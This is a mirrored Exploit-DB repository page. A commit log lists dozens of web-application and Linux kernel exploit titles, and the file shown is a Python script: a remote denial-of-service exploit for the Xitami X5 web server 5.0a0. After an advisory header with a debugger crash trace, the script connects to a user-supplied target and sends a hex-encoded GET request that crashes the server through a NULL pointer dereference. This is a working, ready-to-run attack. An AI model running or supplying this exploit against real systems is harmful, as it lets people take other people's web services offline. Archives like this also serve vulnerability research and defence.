bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40849.py
Offensive Security a5cd225af0 DB: 2016-12-01 
7 new exploits

Xitami Web Server 5.0a0 - Denial of Service
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)
WinPower 4.9.0.4 - Privilege Escalation

Internet PhotoShow (page) - Remote File Inclusion
Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion

EQdkp 1.3.0 - (dbal.php) Remote File Inclusion
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion
CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion

MercuryBoard 1.1.4 - (User-Agent) SQL Injection
MercuryBoard 1.1.4 - 'User-Agent' SQL Injection

EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup
EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup

Web Slider 0.6 - (path) Remote File Inclusion
Web Slider 0.6 - 'path' Parameter Remote File Inclusion

Zomplog 3.8 - (mp3playlist.php speler) SQL Injection
Zomplog 3.8 - 'mp3playlist.php' SQL Injection

EQdkp 1.3.2 - (listmembers.php rank) SQL Injection
EQdkp 1.3.2 - 'listmembers.php' SQL Injection

CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection
CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection

ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection
ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection

Zomplog 3.8.1 - upload_files.php Arbitrary File Upload
Zomplog 3.8.1 - Arbitrary File Upload

CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection

Mega File Hosting Script 1.2 - (fid) SQL Injection
Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection

CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload
AJ HYIP ACME - 'topic_detail.php id' SQL Injection
EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)
e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection
AJ HYIP ACME - 'topic_detail.php' SQL Injection
EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)
e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection

CaLogic Calendars 1.2.2 - (langsel) SQL Injection
CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection
EMO Realty Manager - 'news.php ida' SQL Injection
The Real Estate Script - 'dpage.php docID' SQL Injection
Linkspile - 'link.php cat_id' SQL Injection
Freelance Auction Script 1.0 - (browseproject.php) SQL Injection
EMO Realty Manager - 'ida' Parameter SQL Injection
The Real Estate Script - 'docID' Parameter SQL Injection
Linkspile - 'cat_id' Parameter SQL Injection
Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection
rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities
Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion
rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting
Kostenloses Linkmanagementscript - Remote File Inclusion
newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities
68 Classifieds 4.0 - (category.php cat) SQL Injection
newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection
68 Classifieds 4.0 - 'category.php' SQL Injection

StanWeb.CMS - (default.asp id) SQL Injection
StanWeb.CMS - SQL Injection

Archangel Weblog 0.90.02 - (post_id) SQL Injection
Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection

WR-Meeting 1.0 - (msnum) Local File Disclosure
WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure
FicHive 1.0 - (category) Blind SQL Injection
Smeego 1.0 - (Cookie lang) Local File Inclusion
FicHive 1.0 - 'category' Parameter Blind SQL Injection
Smeego 1.0 - 'Cookie lang' Local File Inclusion

TAGWORX.CMS - Multiple SQL Injections
TAGWORX.CMS 3.00.02 - Multiple SQL Injections
lulieblog 1.2 - Multiple Vulnerabilities
AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin
easycms 0.4.2 - Multiple Vulnerabilities
Lulieblog 1.2 - Multiple Vulnerabilities
AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin
Easycms 0.4.2 - Multiple Vulnerabilities

AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection
AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection

EntertainmentScript - 'play.php id' SQL Injection
EntertainmentScript 1.4.0 - 'play.php' SQL Injection
ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities
Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
ComicShout 2.5 - (index.php comic_id) SQL Injection
eCMS 0.4.2 - SQL Injection / Security Bypass
Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery
ComicShout 2.5 - 'comic_id' Parameter SQL Injection
PHP Jokesite 2.0 - 'cat_id' SQL Injection
Netious CMS 0.4 - (index.php pageid) SQL Injection
PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection
Netious CMS 0.4 - 'pageid' Parameter SQL Injection
6rbScript - 'news.php newsid' SQL Injection
webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
6rbScript - 'news.php' SQL Injection
Weblosninger 4 - Cross-Site Scripting / SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection
Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities
e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection
Quate CMS 0.3.4 - Multiple Vulnerabilities
RoomPHPlanning 1.5 - (idresa) SQL Injection
PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion
RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection
PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion

CMS MAXSITE 1.10 - (category) SQL Injection
CMS MAXSITE 1.10 - 'category' Parameter SQL Injection

CKGold Shopping Cart 2.5 - (category_id) SQL Injection
CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection

ComicShout 2.8 - (news.php news_id) SQL Injection
ComicShout 2.8 - 'news_id' Parameter SQL Injection

AJ HYIP ACME - 'news.php id' SQL Injection
AJ HYIP ACME - 'news.php' SQL Injection

Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting

e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection
AJ HYIP ACME - 'comment.php artid' SQL Injection
AJ HYIP ACME - 'readarticle.php artid' SQL Injection
AJ HYIP ACME - 'comment.php' SQL Injection
AJ HYIP ACME - 'readarticle.php' SQL Injection

6rbScript 3.3 - 'singerid' SQL Injection
6rbScript 3.3 - 'singerid' Parameter SQL Injection

6rbScript 3.3 - (section.php name) Local File Inclusion
6rbScript 3.3 - 'section.php' Local File Inclusion

RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit
RoomPHPlanning 1.6 - 'userform.php' Create Admin User

Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion
Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion

Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection
Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection

ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion
ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion

Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities
Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion

Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities
Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery

YABSoft Advanced Image Hosting Script - SQL Injection
Advanced Image Hosting Script - SQL Injection

MercuryBoard 1.1 - index.php SQL Injection
MercuryBoard 1.1 - 'index.php' SQL Injection

CMS Made Simple 0.10 - Lang.php Remote File Inclusion
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion

Zomplog 3.3/3.4 - detail.php HTML Injection
Zomplog 3.3/3.4 - 'detail.php' HTML Injection

CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting
CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting

EQDKP 1.3.1 - Show Variable Cross-Site Scripting
EQdkp 1.3.1 - Cross-Site Scripting

CMS Made Simple 105 - Stylesheet.php SQL Injection
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection

Internet PhotoShow - 'login_admin' Parameter Unauthorized Access

68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'login.php' Cross-Site Scripting

68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'category.php' Cross-Site Scripting
68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting
68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting
68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting
68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting
68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting
68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting
68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting
Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting

CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload

CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload

Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities
Zomplog 3.9 - 'message' Parameter Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Joomla! Component Catalog 1.0.7 - SQL Injection
Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
Xfinity Gateway - Cross-Site Request Forgery
2016-12-01 07:48:18 +00:00

101 lines
4.6 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
#
#
# X5 Webserver 5.0 Remote Denial Of Service Exploit
#
#
# Vendor: iMatrix
# Product web page: http://www.xitami.com
# Affected version: 5.0a0
#
# Summary: X5 is the latest generation web server from iMatix Corporation.
# The Xitami product line stretches back to 1996. X5 is built using iMatix's
# current Base2 technology for multithreading applications. On multicore machines,
# it is much more scalable than Xitami/2.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious HEAD and GET requests. This can be exploited to cause denial of service
# scenario.
#
# ----------------------------------------------------------------------------
#
# (12c0.164c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c
# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# xitami+0x103ae0:
# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????
# 0:004> kb
# # ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0
# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6
# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa
# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1
# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3
# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293
# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234
# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe
# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70
# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Stefan Petrushevski aka sm - <stefan@zeroscience.mk>
#
#
# Advisory ID: ZSL-2016-5377
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php
#
#
# 15.11.2016
#
import sys, socket
if len(sys.argv) < 3:
print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\n'
print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\n'
print '------------------------------------------------------------\n'
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(666)
payload = (
'\x47\x45\x54\x20\x2f\x50\x52\x4e\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a'
'\x48\x6f\x73\x74\x3a\x20\x31\x37\x32\x2e\x31\x39\x2e\x30\x2e\x32\x31\x35\x0d'
'\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x5a\x53\x4c\x2d\x46\x75'
'\x7a\x7a\x65\x72\x2d\x41\x67\x65\x6e\x74\x2f\x34\x2e\x30\x2e\x32\x38\x35\x20'
'\x0d\x0a\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x78\x6d\x6c\x2c'
'\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x2c\x61\x70\x70'
'\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c'
'\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x74\x65\x78'
'\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x71\x3d\x30\x2e\x38\x2c\x69\x6d\x61\x67\x65'
'\x2f\x70\x6e\x67\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63'
'\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x75\x73'
'\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45'
'\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61'
'\x74\x65\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a'
'\x20\x49\x53\x4f\x2d\x38\x38\x35\x39\x2d\x31\x2c\x75\x74\x66\x2d\x38\x3b\x71'
'\x3d\x30\x2e\x37\x2c\x2a\x3b\x71\x3d\x30\x2e\x37\x0d\x0a\x4b\x65\x65\x70\x2d'
'\x41\x6c\x69\x76\x65\x3a\x20\x33\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74'
'\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x0d\x0a\x0d\x0a'
)
s.send(payload)
s.close
print 'BOOM! \n'
Reference in a new issue View git blame Copy permalink